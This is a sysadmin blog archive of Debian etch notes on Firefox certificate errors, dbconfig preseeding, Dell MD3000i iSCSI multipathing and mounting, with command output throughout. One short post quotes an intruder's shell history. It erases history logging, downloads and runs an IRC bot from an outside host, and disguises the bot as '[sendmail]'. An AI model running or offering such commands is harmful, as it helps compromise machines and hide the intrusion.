Author Archives: btm

Secure Connection Failed

Secure Connection Failed
Hostname uses an invalid security certificate.
The certificate is only valid for *example.org
(Error code: ssl_error_bad_cert_domain)

Firefox 3 produces this error a lot for me. Mostly because I’m using local ssl sites by their hostname rather than their fqdn and the cert only has the fqdn in it. The solution is going to be setting up the hostname in apache as a separate site (servername) rather than a serveralias, and having a rewrite rule to send it to the full site. Of course I’ll need a bunch of code to autogenerate certificates I think, and sign them, which sounds like a terrible bore.
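Something like the following is probably all the apache side needs: one vhost per short hostname that simply bounces to the canonical site (a plain Redirect does the job of the rewrite rule). This is only a sketch with made-up names, and the short-name certificate is the part that would need autogenerating:

<VirtualHost *:443>
    ServerName shortname
    SSLEngine on
    # a per-host, auto-generated cert valid for the bare hostname
    SSLCertificateFile /etc/ssl/certs/shortname.pem
    # send everything to the canonical fqdn site
    Redirect permanent / https://shortname.example.org/
</VirtualHost>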

In the interim, the FF3 error is really rough; it takes a few clicks to get through it, rather than formerly just being able to acknowledge it and continue on. Setting ‘browser.xul.error_pages.expert_bad_cert‘ in ‘about:config’ to true helps a lot, as you don’t get the popup anymore and you just have to click ‘Add exception’ then ‘Confirm security exception’.

preseeding with dbconfig-common

I’ve been playing around with a puppet recipe for ocsng and trying to get a preseed working that would create the database rather than debconf popping up with questions. This task had a number of difficulties.

1) Running the install by hand with apt-get never asked if I wanted to use another host for my mysql database. This is probably a bug, although I never tried changing my debconf priority level. I eventually figured out from some source to use ‘method select tcp/ip’.

2) I then started running into ‘error: Cannot find a question for …’ from debconf-set-selections. Interestingly, the only other place I saw this error was where someone was trying to do something similar with puppet and glpi in Puppet ticket #1213. I eventually found the series of events that causes this and how to work around them, thanks to fjp and cjwatson (these two guys always seem to save my ass) giving me the right places to look. More about that in Debian bug #487300.

3) There isn’t an etch package for ocsng. Not a big deal, the lenny/testing packages don’t really have any new dependencies.

I thought there was something else, but maybe it was that easy. Here’s my seed file as an example:
ocsinventory-server ocsinventory-server/dbconfig-install boolean true
ocsinventory-server ocsinventory-server/mysql/admin-pass password supersecret
ocsinventory-server ocsinventory-server/mysql/method select tcp/ip
ocsinventory-server ocsinventory-server/mysql/app-pass password kindasecret
ocsinventory-server ocsinventory-server/remote/host select mysql01.example.org
ocsinventory-server ocsinventory-server/remote/newhost string mysql01.example.org
ocsinventory-server ocsinventory-server/database-type select mysql
ocsinventory-server ocsinventory-server/db/dbname string ocsweb
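For reference, loading that seed before the install, whether by hand or from whatever puppet ends up exec'ing, looks roughly like this (the seed file path here is made up):

# load the answers into the debconf database, then install non-interactively
debconf-set-selections /var/cache/debconf/ocsinventory-server.seed
DEBIAN_FRONTEND=noninteractive apt-get -y install ocsinventory-server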

open source friendly

I was reading an article at The Register today about more Yahoo executives quitting, specifically Joshua Schachter, the founder of delicious. The article includes a note about Jeremy Zawodny, who left Yahoo recently to sign on at craigslist:

He said in a blog post yesterday: “Over the course of about three seconds, something clicked in my little brain, and I realised that Craigslist is a pretty unique combination of things: a small company with a solid financial base, a great service that I use myself, a focused group of people who really care about doing things well, and an open source-friendly environment.”

I’ve added the emphasis there. I was talking to a friend last night about how a lot of IT people, especially ones I know, are much more connected to the technology they use and the communities around them than to the actual product of their companies. I think I tend to keep that to myself, as I feel most of the non-technical people I work with are apt to mistake that for not caring about the company. Well, perhaps, but we care immensely about what we do, and you hired us to do what we do. How many 20% projects have turned into products? Executives of the world, are you listening?

debian, dell md3000i, dm_multipath and path checking

First, this article, albeit a little step by step and thus simple(?) at times, is really excellent. This article by Dell is worth reading as well, as it uses a number of terms/concepts that may not be familiar to non-storage administrators.

On a couple earlier posts about dm_multipath (1, 2), ‘paul’ had commented “I see some errors in your configuration. The problem is that you are using readsector0 for path checking instead of RDAC and a wrong hwhandler.” He said that following the examples here worked in his situation, but didn’t elaborate on what his situation was exactly. That article/benchmark says:

After trying the array successfully with Fedora Core 5, CentOS5 (which is RHEL 5 64bit) and exploring all the above issues, in the end I settled on SuSE SLES-10-SP1 x86_64 (Suse 10 service pack 1 for 64bit) and used it as-is, there was no need to install anything other than the Java “SMdevices/SMmonitor/SMagent” stuff on the resource CD.

It’s worth noting that those are all RPM based distributions. No surprise, since Dell appears to support them in some way, although as usual, YMMV with any enterprise support. ‘paul’ failed to say why configuring dm_multipath this way is a configuration error, so I set out to read more. It’s important to make the distinction between the MD3000 in that article and the MD3000i which I have.

The MD3000 is traditional Direct-Attached-Storage (DAS) and uses SAS 8470 cables to connect to SAS HBAs in the host. In Highly-Available (HA) mode, you put two HBAs in each of two hosts and connect one HBA in each host to one of the two controllers in the MD3000.

The MD3000i is an iSCSI Storage-Area-Network (SAN) and uses regular gigabit ethernet to connect up to 16 hosts. It’s recommended to use two separate switches and two network cards per host, creating multiple physical paths to each controller on the MD3000i.

My brain had trouble for a while separating DRAC (Dell Remote Access Controller), which is IPMI-like Dell kit, from RDAC (Redundant Disk Array Controller). The benchmark article mentions that the MD3000i is an awful lot like an IBM DS4100. Dell likes rebranding gear, so maybe the MD3000i is just an IBM N3700 or something (I don’t have enough interest to poke through the data sheets). I mention it though because RDAC is a technology in a lot of IBM’s products, so you can sometimes find more information searching for ‘IBM RDAC’ than for Dell.

When I boot up, I only have two paths to a virtual disk:

# multipath -d -ll
sdb: checker msg is “readsector0 checker reports path is down”
sdc: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][active]
\_ 2:0:0:0 sdd 8:48 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 3:0:0:0 sde 8:64 [active][ready]

Both of those paths go through the active controller. If I switch the preferred path in MDSM the disk fails:

# ls
ls: reading directory .: Input/output error
# multipath -d -ll
sdb: checker msg is “readsector0 checker reports path is down”
sdc: checker msg is “readsector0 checker reports path is down”
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][enabled]
\_ 2:0:0:0 sdd 8:48 [failed][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sde 8:64 [failed][faulty]

Running multipath once picks up the other paths:

# multipath
error calling out /sbin/scsi_id -g -u -s /block/sda
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
reload: 36001c23000d59fc600000284478bcdca DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][undef]
\_ 1:0:0:0 sdb 8:16 [undef][ready]
\_ round-robin 0 [prio=1][undef]
\_ 4:0:0:0 sdc 8:32 [undef][ready]
\_ round-robin 0 [prio=0][undef]
\_ 2:0:0:0 sdd 8:48 [failed][faulty]
\_ round-robin 0 [prio=0][undef]
\_ 3:0:0:0 sde 8:64 [failed][faulty]

# multipath -d -ll
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][enabled]
\_ 1:0:0:0 sdb 8:16 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 4:0:0:0 sdc 8:32 [active][ready]
\_ round-robin 0 [prio=0][enabled]
\_ 2:0:0:0 sdd 8:48 [active][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sde 8:64 [active][faulty]

If I now remount the filesystem and change the preferred path back, things work okay. You can see device-mapper failing the paths in the dmesg output:

end_request: I/O error, dev sdb, sector 794703
device-mapper: multipath: Failing path 8:16.
end_request: I/O error, dev sdb, sector 71
end_request: I/O error, dev sdb, sector 8279
end_request: I/O error, dev sdb, sector 12375
end_request: I/O error, dev sdb, sector 794711
end_request: I/O error, dev sdc, sector 794703
device-mapper: multipath: Failing path 8:32.
end_request: I/O error, dev sdc, sector 794711
end_request: I/O error, dev sdc, sector 71
end_request: I/O error, dev sdc, sector 8279
end_request: I/O error, dev sdc, sector 12375

But after touching some files and switching again, things went downhill:

device-mapper: multipath: Failing path 8:48.
end_request: I/O error, dev sde, sector 12735
device-mapper: multipath: Failing path 8:64.
Buffer I/O error on device dm-1, logical block 1586
lost page write due to I/O error on dm-1
Aborting journal on device dm-1.
Buffer I/O error on device dm-1, logical block 1027
lost page write due to I/O error on dm-1

And I ended up with a read-only filesystem. Running multipath dry shows that all the paths have failed; more specifically, the standby paths did not become active:

# multipath -d -ll
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][enabled]
\_ 1:0:0:0 sdb 8:16 [failed][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 4:0:0:0 sdc 8:32 [failed][ready]
\_ round-robin 0 [prio=0][enabled]
\_ 2:0:0:0 sdd 8:48 [failed][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sde 8:64 [failed][faulty]

Futzing around a bit, they would eventually come back, but that’s obviously an unacceptable failure mode for the design. I noticed that lenny, which has 2.6.24 instead of 2.6.18, has the rdac modules:

linux-image-2.6.24-1-686: /lib/modules/2.6.24-1-686/kernel/drivers/md/dm-rdac.ko
multipath-tools: /sbin/mpath_prio_rdac

# multipath
/proc/misc: No entry for device-mapper found
Is device-mapper driver missing from kernel?
Failure to communicate with kernel device-mapper driver.
/proc/misc: No entry for device-mapper found
Is device-mapper driver missing from kernel?
Failure to communicate with kernel device-mapper driver.
Incompatible libdevmapper 1.02.25 (2008-04-10)(compat) and kernel driver

# modprobe dm_mod
# multipath
DM multipath kernel driver not loaded

# modprobe dm-multipath
# multipath
error calling out /lib/udev/scsi_id -g -u -s /block/sda
create: 36001e4f0003968c60000000000000000 DELL ,Universal Xpor
[size=20M][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][undef]
\_ 2:0:0:31 sdc 8:32 [undef][ready]
\_ round-robin 0 [prio=1][undef]
\_ 3:0:0:31 sde 8:64 [undef][ready]
create: 36001c23000d59fc60000000000000000 DELL ,Universal Xpor
[size=20M][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][undef]
\_ 1:0:0:31 sdb 8:16 [undef][ready]
\_ round-robin 0 [prio=1][undef]
\_ 4:0:0:31 sdd 8:48 [undef][ready]
# multipath -d -ll
36001c23000d59fc60000000000000000dm-1 DELL ,Universal Xpor
[size=20M][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][active]
\_ 1:0:0:31 sdb 8:16 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 4:0:0:31 sdd 8:48 [active][ready]
36001e4f0003968c60000000000000000dm-0 DELL ,Universal Xpor
[size=20M][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][active]
\_ 2:0:0:31 sdc 8:32 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 3:0:0:31 sde 8:64 [active][ready]

The kicker here is seeing ‘size=20M’, which gives away that we’re only seeing the access partition. I had logged in before adding the host to the virtual disk mapping, so I ran ‘iscsiadm -m session -R’ to rescan the disks and then ‘multipath -F’ to flush the mapping to the access partition. Still not getting the disks:

sd 1:0:0:31: [sdb] Unit Not Ready
sd 1:0:0:31: [sdb] Sense Key : Illegal Request [current]
sd 1:0:0:31: [sdb] Add. Sense: Logical unit not supported
sd 1:0:0:31: [sdb] READ CAPACITY failed
sd 1:0:0:31: [sdb] Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE,SUGGEST_OK
sd 1:0:0:31: [sdb] Sense Key : Illegal Request [current]
sd 1:0:0:31: [sdb] Add. Sense: Logical unit not supported
sd 1:0:0:31: [sdb] Write Protect is off
sd 1:0:0:31: [sdb] Mode Sense: 0b 00 10 08
sd 1:0:0:31: [sdb] Got wrong page
sd 1:0:0:31: [sdb] Assuming drive cache: write through

I logged out and back in (iscsiadm -m node -u ; iscsiadm -m node -l) and the disks showed up:

# multipath
error calling out /lib/udev/scsi_id -g -u -s /block/sda
sdc: checker msg is “directio checker reports path is down”
sdd: checker msg is “directio checker reports path is down”
reload: 36001c23000d59fc600000284478bcdca DELL ,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][undef]
\_ 5:0:0:0 sdc 8:32 [undef][faulty]
\_ round-robin 0 [prio=1][undef]
\_ 6:0:0:0 sdb 8:16 [active][ready]
\_ round-robin 0 [prio=0][undef]
\_ 8:0:0:0 sdd 8:48 [undef][faulty]
\_ round-robin 0 [prio=1][undef]
\_ 7:0:0:0 sde 8:64 [active][ready]

Swapping the preferred path around basically required running multipath each time so it would detect that the paths had changed. Running multipath is the job of multipathd, so I checked and saw that installing multipath-tools hadn’t actually started it. I started it (/etc/init.d/multipath-tools start), after which I had no I/O problems touching and rm’ing files on the filesystem while swapping the preferred path back and forth in MDSM.

I created /etc/multipath.conf, based on the example here:

devices {
        device {
                vendor                  DELL
                product                 MD3000i
                hardware_handler        "1 rdac"
                path_checker            rdac
                path_grouping_policy    group_by_prio
                prio_callout            "/sbin/mpath_prio_rdac /dev/%n"
                failback                immediate
                getuid_callout          "/lib/udev/scsi_id -g -u -s /block/%n"
        }
}
multipaths {
        multipath {
                device {
                        vendor DELL
                        product MD3000i
                }
        }
}
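As an aside, the repeated ‘error calling out … scsi_id … /block/sda’ lines in the output above are just multipath probing the local disk. A blacklist stanza keeps it quiet; a minimal sketch, assuming sda really is the local, non-multipathed disk:

blacklist {
        devnode "^sda$"
}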

And then set multipath up again:

# /etc/init.d/multipath-tools restart
Stopping multipath daemon: multipathd.
Starting multipath daemon: multipathd.
# multipath -F
libdevmapper: libdm-common.c(374): Removed /dev/mapper/36001c23000d59fc600000284478bcdca-part1
libdevmapper: libdm-common.c(374): Removed /dev/mapper/36001c23000d59fc600000284478bcdca

# multipath -ll
36001c23000d59fc600000284478bcdcadm-0 DELL    ,MD3000i
[size=558G][features=0][hwhandler=1 rdac]
\_ round-robin 0 [prio=6][active]
\_ 5:0:0:0 sdc 8:32  [active][ready]
\_ 8:0:0:0 sdd 8:48  [active][ready]
\_ round-robin 0 [prio=0][enabled]
\_ 6:0:0:0 sdb 8:16  [active][ghost]
\_ 7:0:0:0 sde 8:64  [active][ghost]

Flipping the preferred path this way, I saw far fewer I/O errors in the dmesg output. I’m still not sure what the RDAC path checker does exactly, but it appears to work more cleanly.

Linux certifications and releases

Every once in a while I head over to CertCities to see if they’ve finally gotten around to another Hottest Certs for xxxx, the last of which was in 12/2005, or certification salary surveys, which have fallen behind the times as well. I collect certifications now and then. Initially I picked up a bunch of Microsoft certifications to get a foothold on the Seattle market after moving here. Now they’re not so important because I work for startups where Microsoft comprehension is essential, but challenges lie elsewhere, mostly in Open Source. A while back I went and got an LPIC-1 and LPIC-2, feeling like I should have a Linux certification but didn’t have the time or money for the RHCE lab, or any respect for the CompTIA Linux+. I got an email from LPI today for a survey they’re conducting about where LPI should go from here, which made me head back to CertCities, and I found a number of recent articles by Emmett Dulaney about Linux that made me send him a couple of emails.

One, “Pondering Ubuntu 8.04“, subtitled “Did the few minor tweaks included in the latest version of Ubuntu actually warrant a new release? Emmett’s not so sure.” is about how the lack of new features in hardy doesn’t justify the release. It misses every point of the release cycle, and even comments about how everyone hated Microsoft for making regular releases. Well, because we had to pay for them each time, maybe?

To the folks that think upgrading from Server 2000 to Server 2003 is good because it’s new, you simply present Ubuntu as 7.10 and 8.04. When interacting with colleagues we usually refer to releases by short name such as ‘gutsy’ or ‘hardy’, which allows interjecting debian releases like ‘etch’ and ‘lenny’ without having to specify the distribution explicitly.

Of course, a suitable enough reason for 8.04 is the release cycle itself. Debian has an amazing framework but releases are slow. Debian etch was initially released in 2007-04 and we’re hoping that lenny will be out this year, but we’ll see. Just yesterday I had to backport packages from lenny to etch, because each release gets security updates, not version updates, so you have to wait for the next release for the version updates or go through the trouble of doing the backport yourself.
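The backport itself is usually just a rebuild on the older release. Roughly, assuming deb-src lines for lenny are in sources.list and with the package name as a placeholder:

# assumes the build-dependencies are satisfiable on etch; if not, those need backporting first
apt-get update
apt-get build-dep somepackage
apt-get -b source somepackage/lenny
dpkg -i somepackage_*.deb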

One might question why backport a deb package when you can simply install the new software, and the answer is one of configuration management. Whenever I inherit a network full of linux systems I have to try to figure out what software was installed where. There are many instances where the same software will have been installed as different versions by different people over the years and it’s difficult to tell which is being used. Packaging solves this because (slotting aside) there’s one version installed and you can use packaging software to tell exactly what files belong to that package and where they are.

While this may not seem of immediate benefit to a single user, it is, because it’s essential to troubleshooting user problems for those who provide support, which in the case of Ubuntu is mostly done for free.

While Hardy may not have any visually apparent and stunning changes, I assure you there are lots of updates behind the desktop that are well worth the appreciation.

The other was, “Linux Certs and the Cutting Edge“, subtitled “Some certifications seem stuck in the Dark Ages. Plus, Book of the Week toes the command line.” This article goes on to talk about how “df, du, kill, ls, mv, rm, tar, umask, vi and so on” are on all the tests and offers that it’s because of the “commonality between the distributions”, not because these are all essential utilities. Anyways, here’s my email:

CompTIA is always a terrible example of certifications because it’s so entry level. I can’t complain a whole lot because it’s respected and besides questions that I consider obscure to my job roles (like fixing laser printers) it’s pretty easy to pass the tests.

“df, du, kill, ls, mv, rm, tar, umask, vi and so on”

These are all -essential-. I would never hire someone who failed to explain exactly what each of these tools does. I feel like LPI certifications may be a little overboard because they expect you to know what certain flags do for each command, when you can always look them up in the man page. But knowing the difference between tar -z and tar -j is always a good thing.

For example though, we have a fairly complex configuration employing Debian Linux both hosting vmware-server and running as guests on it, with configuration management by puppet backed by git, and capistrano for system administration. While someone with experience with these things is good, the following is a piece of a puppet recipe I wrote:

# set linux clock algorithm
# non-rescue (single) kernel lines in the grub config that don't have a clock algorithm set get set to pit
# best to run this regularly (this will run every time) so that new kernel installs get this added
# there is the edge case that a kernel is upgraded and we don't wait for puppet to run before the reboot
exec { "set-vmware-clock":
    command => "/bin/sed -ie '/clock\|single/! s/^kernel.*/& clocksource=pit/ ' /boot/grub/menu.lst",
    onlyif  => "/bin/grep '^kernel' /boot/grub/menu.lst | /bin/grep -v 'single' | /bin/grep -v 'clock'",
}

If someone can’t look at that and tell me what it does, they’re not getting hired here. They don’t need to know much about puppet; that they can figure out, and even just by looking at the recipe you get a good idea of what the puppet portion of the configuration is for. But if you’re not familiar with the standard tools, you’re not going to get much done, regardless of how much you may know about something like puppet. If you look at that and know that ‘grep’ returns matching lines of text, but don’t know that ‘-v’ makes it exclude those lines instead, you’re going to miss the point of that recipe.
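To make that concrete, here is what the onlyif pipeline does against a made-up menu.lst excerpt (these kernel lines are hypothetical):

# hypothetical kernel lines from /boot/grub/menu.lst
kernel /vmlinuz-2.6.18-6-686 root=/dev/sda1 ro
kernel /vmlinuz-2.6.18-6-686 root=/dev/sda1 ro single
kernel /vmlinuz-2.6.18-6-686 root=/dev/sda1 ro clocksource=pit
# grep '^kernel' keeps all three lines, grep -v 'single' drops the rescue entry,
# and grep -v 'clock' drops the one already fixed; anything left means sed still has work to do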

The key isn’t that these tools are distribution neutral, giving you a lot of common ground. The key is that these tools are extremely powerful provided you know how to use them. The more you familiarize yourself with them, the more you can chain them together and make more powerful solutions.

HISTFAIL

  494  unset HISTIFLE
  495  w
  496  ps x
  497  ls
  498  rm -rf piata
  499  wget www.f-dic.com/bot.tar ; tar xzvf bot.tar ; rm -rf bot.tar ; mv bot root-uscreens ; chmod 700 root-uscreens ; cd root-uscreens ; PATH=.:$PATH ; mv bash sendmail ; cp sendmail [sendmail] ; [sendmail]

A box got left with ssh open on it. I like the ‘HISTIFLE’ part. IRC bots? This feels so very 1995. bot.tar comes with pico though, just in case you can’t use vi!

automatic open-iscsi volume mounting on debian etch

This is a continuation of my work on getting open-iscsi working on etch and then getting dm_multipath working.

Note that I have the pass column in the fstab set to 0 so the system won’t fail to boot when fstab can’t find this partition early in the boot process; this is important.

I started off trying to use _netdev as a mount option. I verified in ‘/etc/init.d/mountall.sh’ that debian does use mount -a -O no_netdev to avoid mounting network devices before networking is up, but while watching the startup (vmware is great for this) I saw it was still trying to mount early in the boot process anyways, and the UUID wasn’t there yet, of course, since iscsi and networking weren’t there yet.

I took a look in the initrd (‘mkdir /tmp/initrd ; cd /tmp/initrd ; cat /boot/initrd.img-`uname -r` | cpio -idmv’) in search of where it reads the fstab to see if that was the same case and saw that ‘scripts/local-top/iscsi’ definitely was trying to get iscsi things done. It’s worth noting this may not have been there if I hadn’t recreated my initrd recently in my last post. I recalled seeing some notes about root on iscsi in ‘/usr/share/doc/open-iscsi/README.Debian’ (comes with the open-iscsi deb).

Somehow I got an additional node that produced an error about failing to log in since it already existed. I stopped the open-iscsi init script and removed the corresponding folder in the /etc/iscsi/nodes/ tree, then restarted open-iscsi. It caught my eye that this script reported ‘Mounting network filesystems’, so I looked in the script and on line 102 saw ‘mount -a -O _netdev’, which mounts lines tagged with the ‘_netdev’ option. On reviewing my fstab I saw I had two mounts, one commented out using /dev/dm-1 and the other not commented out using the UUID. The UUID mount was using ‘defaults’ while the devmapper mount was using ‘_netdev’. I switched the UUID mount to use the _netdev option, rebooted, and saw my filesystem mounted. I ran ‘rm /etc/iscsi/iscsi.initramfs’ to make sure my earlier on-boot initramfs work wasn’t what made the difference, and that was confirmed.
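As an aside, clearing a stale node record like that is just a matter of stopping open-iscsi and deleting the record; a rough sketch, with the target IQN left as a placeholder:

/etc/init.d/open-iscsi stop
# <target-iqn> stands in for whichever record is stale under /etc/iscsi/nodes/
rm -r /etc/iscsi/nodes/<target-iqn>
/etc/init.d/open-iscsi start
# alternatively, without poking the filesystem directly:
# iscsiadm -m node -o delete -T <target-iqn>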

The trick is simply to set your fstab up using the UUID (use ‘blkid’ to get it), options set to ‘_netdev’ and pass set to ‘0’:

UUID=8d070de0-403c-4669-9db0-5b17e3aeebc5 /mnt ext3 _netdev 0 0

Of course the ext3 partition won’t get fscked on startup, but that’s just the filesystem I was using for testing. The ultimate goal is to use GFS or OCFS or something to create an iscsi volume fronted by NFS on multiple servers.

So the open-iscsi init.d script actually does the mounting that finally works. This is mentioned in this group thread, although it’s worth noting that I set ‘node.startup = automatic’ and left ‘node.conn[0].startup = manual’ on each node. I don’t know what the difference is. In response to this later thread, I did not have to use an extra script.

dm_multipath and open-iscsi on debian etch

So I got open-iscsi working on debian, in so much that I had four disks; the two paths to the ‘preferred controller’ were good but the two to the second controller weren’t, and switching the preferred controller swapped which pair worked.

After installing multipath-tools I started looking at dmsetup but the target types listed in the man page: linear, striped and error, didn’t make sense. When I read the INTRO file included in the debian package I saw there were additional types snapshot and mirror. This thread clued me in to there being a multipath type.

Running ‘multipath -v 3 -ll’ provided some more information that made things click in my head. Running ‘blkid’ produced:

/dev/mapper/36001c23000d59fc600000284478bcdca1: UUID="8d070de0-403c-4669-9db0-5b17e3aeebc5" SEC_TYPE="ext2" TYPE="ext3"
/dev/sda1: UUID="742239f4-b6fe-4422-b1a2-5639e5ab4675" SEC_TYPE="ext2" TYPE="ext3"
/dev/sda5: TYPE="swap"

The mapper device was created by running multipath and seemed to figure bits out on its own, such that running just ‘multipath -ll’ would show the paths that were and were not working (that’s a different problem).

sdb: checker msg is “readsector0 checker reports path is down”
sdc: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sdb 8:16 [active][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 6:0:0:0 sdc 8:32 [active][faulty]
\_ round-robin 0 [prio=1][active]
\_ 4:0:0:0 sdd 8:48 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 5:0:0:0 sde 8:64 [active][ready]

For a while I was getting ‘mount: no such partition found’ when trying to mount by the UUID shown by ‘blkid’. The error just stopped happening while I was researching the problem. The man page for mount indicates it needs access to /proc/partitions, but I saw nothing related to UUIDs in there or elsewhere poking around /proc. I noticed there was a correct symlink in /dev/disk/by-uuid, so I rebooted the machine and checked again and it was gone. ‘iscsiadm -m session’ confirmed no sessions, but ‘iscsiadm -m node’ had the nodes cached, so I ran ‘iscsiadm -m node -L all’ to log in again and verified the sessions again. I looked in /dev/disk/by-uuid and the UUID had shown up again. multipathd was running at startup so I figure it got things going again.

Interestingly, ‘multipath -ll’ only showed

sdb: checker msg is “readsector0 checker reports path is down”
sdc: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=1][active]
\_ 2:0:0:0 sdd 8:48 [active][ready]
\_ round-robin 0 [prio=1][enabled]
\_ 3:0:0:0 sde 8:64 [active][ready]

Changing the preferred path made the disks go down and the dm faulty:

root@file01:/mnt# multipath -ll
sdd: checker msg is “readsector0 checker reports path is down”
sde: checker msg is “readsector0 checker reports path is down”
36001c23000d59fc600000284478bcdcadm-0 DELL,MD3000i
[size=558G][features=0][hwhandler=0]
\_ round-robin 0 [prio=0][enabled]
\_ 2:0:0:0 sdd 8:48  [failed][faulty]
\_ round-robin 0 [prio=0][enabled]
\_ 3:0:0:0 sde 8:64  [failed][faulty]

Running ‘multipath’ added the other two block devices again and I remounted ok.  This time the filesystem stayed happy when I changed the preferred path. I’m willing to suspect that you can only access a virtual disk via one controller at a time, although from either interface on that controller. That is, you can only access it on the second controller when the first one fails or you manually change the preferred path. The work is just getting everything set up so that it works on startup. What’s missing appears to be getting the iscsi login and then the multipath to include all disks, then your normal automount in fstab.

‘iscsiadm -m node -o show’ reports ‘node.startup = manual’ which is also set in /etc/iscsid.conf and /etc/iscsi/iscsid.conf. I ran ‘iscsiadm -m node -o update -n node.startup -v automatic’. Rebooting saw the login automatically firing.

Putting the UUID or /dev/dm-1 in the fstab wasn’t working. Watching the console it was obvious it was trying to mount the partition before the multipath stuff ran. Per ‘/usr/share/doc/multipath-tools-initramfs/README.Debian’ in the ‘multipath-tools-initramfs’ package I ran ‘update-initramfs -t -c -v -k `uname -r`’.

On reboot I saw “FATAL: Module dm_multipath not found.” While multipath may have been part of the problem, it seems like even with _netdev as a mount option the device is trying to be mounted before the open-iscsi daemon runs. I’ll leave that problem and post for another day; tomorrow if I’m lucky and nothing breaks.

pyzor: check failed: no response

~# spamassassin -D pyzor < ~abuse/Maildir/new/1211380929.V801Ic04fM701311.mx2
[12963] dbg: pyzor: network tests on, attempting Pyzor
[12963] dbg: pyzor: pyzor is available: /usr/bin/pyzor
[12963] dbg: pyzor: opening pipe: /usr/bin/pyzor check < /tmp/.spamassassin12963MwNYaWtmp
[12963] dbg: pyzor: [12964] finished: exit=0x0100
[12963] dbg: pyzor: check failed: no response
[12963] info: rules: meta test DIGEST_MULTIPLE has undefined dependency ‘DCC_CHECK’

The no response seemed bad. However:

# wget http://www200.pair.com/mecham/spam/sample-spam.txt
# spamassassin -D pyzor <sample-spam.txt
[12961] dbg: pyzor: network tests on, attempting Pyzor
[12961] dbg: pyzor: pyzor is available: /usr/bin/pyzor
[12961] dbg: pyzor: opening pipe: /usr/bin/pyzor check < /tmp/.spamassassin12961WKN9Tptmp
[12961] dbg: pyzor: got response: 82.94.255.100:24441 (200, ‘OK’) 82 0
[12961] dbg: pyzor: listed: COUNT=82/5 WHITELIST=0
[12961] info: rules: meta test DIGEST_MULTIPLE has undefined dependency ‘DCC_CHECK’

So actually I’m figuring Pyzor is working fine (this is with spamassassin installed via package on debian etch and use_pyzor 1 in local.cf). Got the idea from here.

iscsi on debian etch with open-iscsi and a dell md3000i initial notes

I had some problems using the debian open-iscsi package to connect to the md3000i on debian etch; both package versions 2.0.869.2-2 and 2.0.730-1etch1. A couple folks on the open-iscsi list pointed out there were problems with the kernel modules, so I compiled those from the open-iscsi source and diverted the debian modules. Details are here on the list.

Most open-iscsi documentation is in the README.

# iscsiadm -m discovery --type sendtargets --portal 10.0.9.10 -P 1
Target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a
Portal: 10.0.9.12:3260,2
Iface Name: default
Portal: 10.0.9.11:3260,1
Iface Name: default
Portal: 10.0.9.10:3260,1
Iface Name: default
Portal: 10.0.9.13:3260,2
Iface Name: default

The MD3000i has two controllers, each with one out-of-band management port and two iscsi ports, which can be seen above. When logging in, it grabs all the disks mapped as separate devices. I removed the ‘access’ mapping, which is that odd 16/20mb partition. Notes about that are deep in here, and I remember Dell telling me it wasn’t really needed on the Windows server either.

# iscsiadm -m node -l
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.12,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.13,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.10,3260]
Logging in to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.11,3260]
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.12,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.13,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.10,3260]: successful
Login to [iface: default, target: iqn.1984-05.com.dell:powervault.6001c23000d59fc6000000004754447a, portal: 10.0.9.11,3260]: successful

It logs in to each portal interface. I guess you use dm_multipath to hook them all back together, but I haven’t gotten that far.

 # cat /proc/partitions
major minor  #blocks  name

8     0    3145728 sda
